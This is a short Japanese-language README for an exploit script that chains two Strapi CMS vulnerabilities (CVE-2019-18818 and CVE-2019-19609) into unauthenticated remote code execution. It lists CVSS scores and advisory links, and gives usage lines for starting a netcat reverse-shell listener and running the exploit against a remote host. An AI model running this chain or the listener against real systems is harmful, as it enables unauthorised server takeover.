
Strapi CMS 3.0.0-beta.17.4 - 未認証のリモートコード実行 (CVE-2019-18818, CVE-2019-19609)
このエクスプロイトは、Strapi CMS フレームワーク バージョン 3.0.0-beta-17.4 の 2 つの脆弱性を対象とし、認証なしのリモートコード実行(RCE)を可能にします。
忘れたパスワードに対する脆弱なパスワード回復メカニズム
CVSS: 9.8 - 緊急
詳細: https://nvd.nist.gov/vuln/detail/CVE-2019-18818
OS コマンドで使用される特殊要素の不適切な無害化('OS コマンドインジェクション')
CVSS: 7.2 - 高
詳細: https://nvd.nist.gov/vuln/detail/CVE-2019-19609
このエクスプロイトを実行する前に、以下のオプションで指定する lport で netcat リスナーを起動してください。
nc -lnvp <lport>
exploit.py <rhost> <lhost> <lport>